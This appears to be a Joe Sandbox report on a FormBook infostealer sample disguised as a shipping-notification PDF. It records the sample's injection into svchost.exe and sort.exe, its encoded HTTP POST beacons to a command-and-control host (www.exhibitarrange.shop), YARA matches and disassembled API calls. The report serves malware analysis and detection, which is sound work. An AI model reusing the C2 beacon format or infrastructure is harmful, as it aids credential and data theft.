                                        29192.168.2.75498134.76.205.124802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:37:10.877783060 CEST750OUTPOST /yxqi/ HTTP/1.1
                                        Host: www.exhibitarrange.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.exhibitarrange.shop
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.exhibitarrange.shop/yxqi/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 34 36 4d 70 61 2b 30 70 4b 41 51 59 65 61 36 32 73 48 38 2f 49 4d 61 4c 76 77 44 52 46 6b 4d 45 6d 47 49 75 55 51 33 54 6d 63 65 62 73 53 72 30 6c 2b 32 50 32 52 4b 59 46 4e 46 6f 63 71 31 32 65 76 2b 6e 54 5a 33 43 6d 78 33 73 71 59 78 6c 2b 77 32 36 7a 50 57 6c 41 67 55 2f 68 49 32 37 4f 78 46 2b 44 71 6d 46 77 5a 57 34 7a 30 41 37 51 44 6d 6c 77 48 72 61 5a 65 6b 39 79 4a 36 6e 6a 38 32 45 50 33 71 6d 4d 72 6a 33 4e 32 56 67 33 46 7a 77 67 2f 51 4e 78 61 4c 47 57 68 79 46 4d 4f 47 37 54 79 48 5a 42 6c 6d 4f 38 59 6a 69 39 39 72 6f 6e 71 67 45 7a 31 35 71 52 53 64 43 6d 46 53 41 4a 6e 65 56 32 68 69 55 39 77 57 42 2b 77 3d 3d
                                        Data Ascii: 3h-p=46Mpa+0pKAQYea62sH8/IMaLvwDRFkMEmGIuUQ3TmcebsSr0l+2P2RKYFNFocq12ev+nTZ3Cmx3sqYxl+w26zPWlAgU/hI27OxF+DqmFwZW4z0A7QDmlwHraZek9yJ6nj82EP3qmMrj3N2Vg3Fzwg/QNxaLGWhyFMOG7TyHZBlmO8Yji99ronqgEz15qRSdCmFSAJneV2hiU9wWB+w==
                                        Sep 27, 2024 06:37:11.483444929 CEST116INHTTP/1.1 404 Not Found
                                        Server: Caddy
                                        Date: Fri, 27 Sep 2024 04:37:11 GMT
                                        Content-Length: 0
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        30192.168.2.75498234.76.205.124802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:37:13.458482981 CEST770OUTPOST /yxqi/ HTTP/1.1
                                        Host: www.exhibitarrange.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.exhibitarrange.shop
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.exhibitarrange.shop/yxqi/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 34 36 4d 70 61 2b 30 70 4b 41 51 59 65 35 69 32 75 6b 55 2f 64 63 61 49 6a 51 44 52 50 45 4d 41 6d 48 30 75 55 52 79 4f 6d 6f 79 62 73 79 62 30 6b 2f 32 50 31 52 4b 59 4b 74 46 74 59 71 31 39 65 76 6a 53 54 63 66 43 6d 78 7a 73 71 5a 68 6c 2b 48 43 37 79 66 57 6e 4a 41 55 39 6c 49 32 37 4f 78 46 2b 44 71 69 76 77 59 2b 34 7a 45 77 37 54 69 6d 69 35 6e 71 6f 51 2b 6b 39 32 4a 36 6a 6a 38 32 36 50 32 6e 44 4d 70 72 33 4e 30 64 67 7a 48 62 33 37 50 51 48 73 71 4b 6c 5a 77 76 5a 46 74 58 47 4c 44 62 58 5a 57 61 37 35 75 2b 41 6e 66 6e 45 35 37 59 2f 33 33 64 63 47 30 41 33 6b 45 57 59 45 46 71 30 70 57 48 2b 77 69 33 46 6f 42 65 4b 4a 37 38 65 66 53 62 56 2f 78 4d 4c 6c 72 53 38 53 4c 67 3d
                                        Data Ascii: 3h-p=46Mpa+0pKAQYe5i2ukU/dcaIjQDRPEMAmH0uURyOmoybsyb0k/2P1RKYKtFtYq19evjSTcfCmxzsqZhl+HC7yfWnJAU9lI27OxF+DqivwY+4zEw7Timi5nqoQ+k92J6jj826P2nDMpr3N0dgzHb37PQHsqKlZwvZFtXGLDbXZWa75u+AnfnE57Y/33dcG0A3kEWYEFq0pWH+wi3FoBeKJ78efSbV/xMLlrS8SLg=
                                        Sep 27, 2024 06:37:14.082459927 CEST116INHTTP/1.1 404 Not Found
                                        Server: Caddy
                                        Date: Fri, 27 Sep 2024 04:37:13 GMT
                                        Content-Length: 0
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        31192.168.2.75498334.76.205.12480
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:37:17.270239115 CEST1783OUTPOST /yxqi/ HTTP/1.1
                                        Host: www.exhibitarrange.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.exhibitarrange.shop
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.exhibitarrange.shop/yxqi/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 34 36 4d 70 61 2b 30 70 4b 41 51 59 65 35 69 32 75 6b 55 2f 64 63 61 49 6a 51 44 52 50 45 4d 41 6d 48 30 75 55 52 79 4f 6d 70 6d 62 73 42 54 30 6b 63 4f 50 30 52 4b 59 55 39 46 73 59 71 31 67 65 76 71 61 54 63 61 2f 6d 7a 37 73 34 4f 68 6c 33 53 75 37 38 66 57 6e 57 51 55 38 68 49 32 75 4f 79 39 68 44 71 79 76 77 59 2b 34 7a 43 55 37 45 6a 6d 69 31 48 72 61 5a 65 6b 70 79 4a 36 4c 6a 2f 48 42 50 32 6a 39 4e 61 54 33 4d 55 4e 67 31 6a 37 33 6d 2f 51 4a 76 71 4b 44 5a 77 6a 77 46 74 36 35 4c 44 75 43 5a 56 4b 37 36 49 4c 57 30 62 6e 4d 6b 72 41 53 2b 48 42 72 42 46 6b 6d 70 32 75 58 4e 79 57 77 71 47 47 41 35 7a 58 61 75 32 76 72 54 71 6c 70 58 6d 6a 56 76 42 31 33 2b 4b 2b 5a 52 4d 49 73 32 71 64 71 54 7a 32 35 62 50 71 59 2b 67 69 58 34 50 43 33 74 6a 56 33 63 72 6c 59 69 67 6b 49 70 36 6c 59 67 44 6a 35 74 78 47 32 4e 77 4e 42 52 6f 68 55 66 46 69 51 77 6a 49 53 49 48 49 6c 43 53 74 6a 4c 77 38 52 53 47 4d 67 43 4a 2f 42 56 47 44 4e 50 77 31 62 50 71 68 37 59 65 44 48 69 5a 52 54 76 [TRUNCATED]
                                        Data Ascii: 3h-p=46Mpa+0pKAQYe5i2ukU/dcaIjQDRPEMAmH0uURyOmpmbsBT0kcOP0RKYU9FsYq1gevqaTca/mz7s4Ohl3Su78fWnWQU8hI2uOy9hDqyvwY+4zCU7Ejmi1HraZekpyJ6Lj/HBP2j9NaT3MUNg1j73m/QJvqKDZwjwFt65LDuCZVK76ILW0bnMkrAS+HBrBFkmp2uXNyWwqGGA5zXau2vrTqlpXmjVvB13+K+ZRMIs2qdqTz25bPqY+giX4PC3tjV3crlYigkIp6lYgDj5txG2NwNBRohUfFiQwjISIHIlCStjLw8RSGMgCJ/BVGDNPw1bPqh7YeDHiZRTvkNZOqG5vQ7T+keNyGD2qfCsNwAGjUvxrPIGiY7PN6D7hc1XN/HvCQLsB7U7Ki6IPiS258hKBqzZpRtm8vhzR5/O5zR9H09xfgogurSpnrCgUnJ0K599ndUPqnWZh1FhUiYUnEOGPi5cC1dLR2AJ+VaBKUnPTeYW06+lckNwwbvm7V71zoM2WYuovVzZuvTfIRER0rqeyA8G3AmObkja8lspZ7awXYzilUrzwKGQMsOfUfnt9agb5xyNZXPNiTaeBDk4anxaERZ9wNPtRtoWdgQ0VkPvCZJuikyp20xD+zQMDoWpb+kElevEsUOotgusxEuVQRmP3wVTa7QNzlSDb2Bwee2RE215OAvsNlsv/Phq4LsacwsHyOYx4iNEmTZAEU7PqEmkVDloBuHZx3u6yXq0VHmkwtl34o34WfObz+ZDL3W8olwM39gbFLiapNk25Ol75UQwfuf6v3gRbq4YtdeJwdBhdNECcRZUAxU5g3sYXiI82K0wjxD8evQ4x/iJclLflXEGtyrbnvJB6J6/+rEA+NwXBWTUGwbk3711yoDtPcfy+tP/G+VHKeUsNiEMEekf2GL8owRUykFpFb57elacGczlfjSN/5Mc9kdGeTjDTzNoxpXernLpfrh8oIWkPfBPK6Lp5FwvFM2TJRSGgwJadVzTlNHAguI [TRUNCATED]
                                        Sep 27, 2024 06:37:17.893306971 CEST116INHTTP/1.1 404 Not Found
                                        Server: Caddy
                                        Date: Fri, 27 Sep 2024 04:37:17 GMT
                                        Content-Length: 0
                                        Connection: close


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:5
                                        Start time:00:34:09
                                        Start date:27/09/2024
                                        Path:C:\Users\user\Desktop\shipping notification_pdf.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\shipping notification_pdf.exe"
                                        Imagebase:0x400000
                                        File size:1'359'839 bytes
                                        MD5 hash:D9E239C79F89EC481EC939D7F784C89E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:00:34:15
                                        Start date:27/09/2024
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\shipping notification_pdf.exe"
                                        Imagebase:0xca0000
                                        File size:46'504 bytes
                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:00:34:27
                                        Start date:27/09/2024
                                        Path:C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe"
                                        Imagebase:0x30000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:11
                                        Start time:01:52:33
                                        Start date:27/09/2024
                                        Path:C:\Windows\SysWOW64\sort.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\sort.exe"
                                        Imagebase:0x700000
                                        File size:24'576 bytes
                                        MD5 hash:D0D6250804C3102A17051406BBDBF3D6
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:false

                                        General

                                        Target ID:12
                                        Start time:01:52:47
                                        Start date:27/09/2024
                                        Path:C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe"
                                        Imagebase:0x30000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:14
                                        Start time:01:53:06
                                        Start date:27/09/2024
                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                        Imagebase:0x7ff722870000
                                        File size:676'768 bytes
                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:1.4%
                                          Dynamic/Decrypted Code Coverage:5.4%
                                          Signature Coverage:8.5%
                                          Total number of Nodes:130
                                          Total number of Limit Nodes:9
                                          execution_graph 78258 42f413 78261 42e1f3 78258->78261 78264 42c463 78261->78264 78263 42e20c 78265 42c47d 78264->78265 78266 42c48e RtlFreeHeap 78265->78266 78266->78263 78267 42e2d3 78270 42c413 78267->78270 78269 42e2ee 78271 42c430 78270->78271 78272 42c441 RtlAllocateHeap 78271->78272 78272->78269 78273 424463 78274 42447f 78273->78274 78275 4244a7 78274->78275 78276 4244bb 78274->78276 78277 42c0e3 NtClose 78275->78277 78283 42c0e3 78276->78283 78279 4244b0 78277->78279 78280 4244c4 78286 42e313 RtlAllocateHeap 78280->78286 78282 4244cf 78284 42c0fd 78283->78284 78285 42c10e NtClose 78284->78285 78285->78280 78286->78282 78377 4247f3 78382 42480c 78377->78382 78378 42489c 78379 424854 78380 42e1f3 RtlFreeHeap 78379->78380 78381 424864 78380->78381 78382->78378 78382->78379 78383 424897 78382->78383 78384 42e1f3 RtlFreeHeap 78383->78384 78384->78378 78385 42b6b3 78386 42b6d0 78385->78386 78389 3672df0 LdrInitializeThunk 78386->78389 78387 42b6f8 78389->78387 78247 413ac3 78248 413add 78247->78248 78253 417273 78248->78253 78250 413afb 78251 413b40 78250->78251 78252 413b2f PostThreadMessageW 78250->78252 78252->78251 78254 417297 78253->78254 78255 4172d3 LdrLoadDll 78254->78255 78256 41729e 78254->78256 78255->78256 78256->78250 78287 41ada3 78288 41ade7 78287->78288 78289 41ae08 78288->78289 78290 42c0e3 NtClose 78288->78290 78290->78289 78390 41a073 78391 41a0e5 78390->78391 78392 41a08b 78390->78392 78392->78391 78394 41dfa3 78392->78394 78395 41dfc9 78394->78395 78399 41e0c0 78395->78399 78400 42f453 RtlAllocateHeap RtlFreeHeap 78395->78400 78397 41e05e 78398 42b703 LdrInitializeThunk 78397->78398 78397->78399 78398->78399 78399->78391 78400->78397 78401 4135b3 78402 413562 78401->78402 78403 413549 78401->78403 78406 42c373 78402->78406 78407 42c38d 78406->78407 78410 3672c70 LdrInitializeThunk 78407->78410 78408 413575 78410->78408 78257 3672b60 LdrInitializeThunk 78291 418828 78292 42c0e3 NtClose 78291->78292 78293 418832 78292->78293 78294 4019ed 78295 4019ee 78294->78295 78295->78295 78298 42f883 78295->78298 78301 42dda3 78298->78301 78302 42ddc9 78301->78302 78313 4073b3 78302->78313 78304 42dddf 78312 401b1f 78304->78312 78316 41abb3 78304->78316 78306 42ddfe 78309 42de13 78306->78309 78331 42c4b3 78306->78331 78327 427d83 78309->78327 78310 42de2d 78311 42c4b3 ExitProcess 78310->78311 78311->78312 78315 4073c0 78313->78315 78334 415f33 78313->78334 78315->78304 78317 41abdf 78316->78317 78352 41aaa3 78317->78352 78320 41ac24 78322 41ac40 78320->78322 78325 42c0e3 NtClose 78320->78325 78321 41ac0c 78323 41ac17 78321->78323 78324 42c0e3 NtClose 78321->78324 78322->78306 78323->78306 78324->78323 78326 41ac36 78325->78326 78326->78306 78328 427de4 78327->78328 78330 427df1 78328->78330 78363 4180d3 78328->78363 78330->78310 78332 42c4d0 78331->78332 78333 42c4e1 ExitProcess 78332->78333 78333->78309 78335 415f4d 78334->78335 78337 415f66 78335->78337 78338 42cb73 78335->78338 78337->78315 78340 42cb8d 78338->78340 78339 42cbbc 78339->78337 78340->78339 78345 42b703 78340->78345 78343 42e1f3 RtlFreeHeap 78344 42cc35 78343->78344 78344->78337 78346 42b71d 78345->78346 78349 3672c0a 78346->78349 78347 42b749 78347->78343 78350 3672c11 78349->78350 78351 3672c1f LdrInitializeThunk 78349->78351 78350->78347 78351->78347 78353 41aabd 78352->78353 78357 41ab99 78352->78357 78358 42b7a3 78353->78358 78356 42c0e3 NtClose 78356->78357 78357->78320 78357->78321 78359 42b7bd 78358->78359 78362 36735c0 LdrInitializeThunk 78359->78362 78360 41ab8d 78360->78356 78362->78360 78365 4180d6 78363->78365 78364 41860b 78364->78330 78365->78364 78371 413733 78365->78371 78367 41822a 78367->78364 78368 42e1f3 RtlFreeHeap 78367->78368 78369 418242 78368->78369 78369->78364 78370 42c4b3 ExitProcess 78369->78370 78370->78364 78372 413743 78371->78372 78374 4137bc 78372->78374 78376 41aec3 RtlFreeHeap LdrInitializeThunk 78372->78376 78374->78367 78375 4137b2 78375->78367 78376->78375

                                          Executed Functions

                                          Function 00417273 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 58 417273-41728f 59 417297-41729c 58->59 60 417292 call 42eef3 58->60 61 4172a2-4172b0 call 42f4f3 59->61 62 41729e-4172a1 59->62 60->59 65 4172c0-4172d1 call 42d873 61->65 66 4172b2-4172bd call 42f793 61->66 71 4172d3-4172e7 LdrLoadDll 65->71 72 4172ea-4172ed 65->72 66->65 71->72
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004172E5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: cc2e2eeabfe5aa2f3bcae61bb068a042517829d55ca8f3e828244603fde8ea91
                                          • Instruction ID: 5b3866d6c55456efcc321e0210c3b5a891dda245b75723c478729dde4aefc097
                                          • Opcode Fuzzy Hash: cc2e2eeabfe5aa2f3bcae61bb068a042517829d55ca8f3e828244603fde8ea91
                                          • Instruction Fuzzy Hash: 9C0152B5E0010DA7DB10DAE1DC42FDEB378AB54308F0041A6F90897240F674EB498755
                                          Function 0042C0E3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 83 42c0e3-42c11c call 404783 call 42d363 NtClose
                                          APIs
                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C117
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 1ebc1b17328d7b51ea5f62271b12f00b040010b2dc37a92e0c9861cf2918f4dd
                                          • Instruction ID: b2fbfe8fb6e7c75b6336c3620b2fb76b95cdf9ae85106dfdfef08fe293474b96
                                          • Opcode Fuzzy Hash: 1ebc1b17328d7b51ea5f62271b12f00b040010b2dc37a92e0c9861cf2918f4dd
                                          • Instruction Fuzzy Hash: 9CE04F716002147BD510EA6ADC42FAB77ACDFC5B24F00401AFE5C67142C7757A1086E5
                                          Function 036735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 100 36735c0-36735cc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6137beca0e7834bca7ee2681fdbfb31d3478a6c9e68e18d62e9f842641a3eaf3
                                          • Instruction ID: 14704e88bd9990a7bf10593cddd3698b0d90077dcbd448423a2d23fe0b545408
                                          • Opcode Fuzzy Hash: 6137beca0e7834bca7ee2681fdbfb31d3478a6c9e68e18d62e9f842641a3eaf3
                                          • Instruction Fuzzy Hash: 3A90023160550802D100B6584554746100687D4301FA5C511A042466CE87D58A5165A2
                                          Function 03672B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 3672b60-3672b6c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b47d092546cf0f668c24698b700959e6e4ba002d712871d4bc7a91d939c14bae
                                          • Instruction ID: 477d092c06117334780cd49e62da7514cc2248fe399308c3f7817f4bebfa49c6
                                          • Opcode Fuzzy Hash: b47d092546cf0f668c24698b700959e6e4ba002d712871d4bc7a91d939c14bae
                                          • Instruction Fuzzy Hash: 87900261202404034105B6584454656400B87E4301B95C121E1014694EC66589916125
                                          Function 03672DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 99 3672df0-3672dfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 0c1941189cb1d193a099106bec33393777b3f246b878689b08df1d155923ecdd
                                          • Instruction ID: 6cebf13566ce982b6a45d412a60939e0e5e16a162780faa10336b83753f66aa7
                                          • Opcode Fuzzy Hash: 0c1941189cb1d193a099106bec33393777b3f246b878689b08df1d155923ecdd
                                          • Instruction Fuzzy Hash: 4490023120140813D111B6584544747000A87D4341FD5C512A042465CE97968A52A121
                                          Function 03672C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 98 3672c70-3672c7c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: fdc63664eb2456a73da58ae88b433236a598b136d3383bb955f8bad88925d6ea
                                          • Instruction ID: 57c9decabb3b232f45a361f624714e0ec6778d0d7793dceab87a2f73d3ff40a1
                                          • Opcode Fuzzy Hash: fdc63664eb2456a73da58ae88b433236a598b136d3383bb955f8bad88925d6ea
                                          • Instruction Fuzzy Hash: 5890023120148C02D110B658844478A000687D4301F99C511A442475CE87D589917121
                                          Function 004180D3 Relevance: .4, Instructions: 437COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4ecc94f66fa931a6cbf2a0985ec9c70e5e19c083577cbe8796aad7140df6bcb3
                                          • Instruction ID: 0e8a4bae6d7bc7a9ba776a69328887685c5c56d7e6b9e4bfc3edb8f009fde6d9
                                          • Opcode Fuzzy Hash: 4ecc94f66fa931a6cbf2a0985ec9c70e5e19c083577cbe8796aad7140df6bcb3
                                          • Instruction Fuzzy Hash: 64F1B271D0021AAFDB24CF94DC81AEFB779AF44304F1481AEE509A7241DB786A85CFA5
                                          Function 00413A5B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • PostThreadMessageW.USER32(30G910fd,00000111,00000000,00000000), ref: 00413B3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: 30G910fd$30G910fd$LDio
                                          • API String ID: 1836367815-2040179008
                                          • Opcode ID: d50d47f08f1558f057d5d50af4955f50951a7d766de3ac934ba27d1afa362163
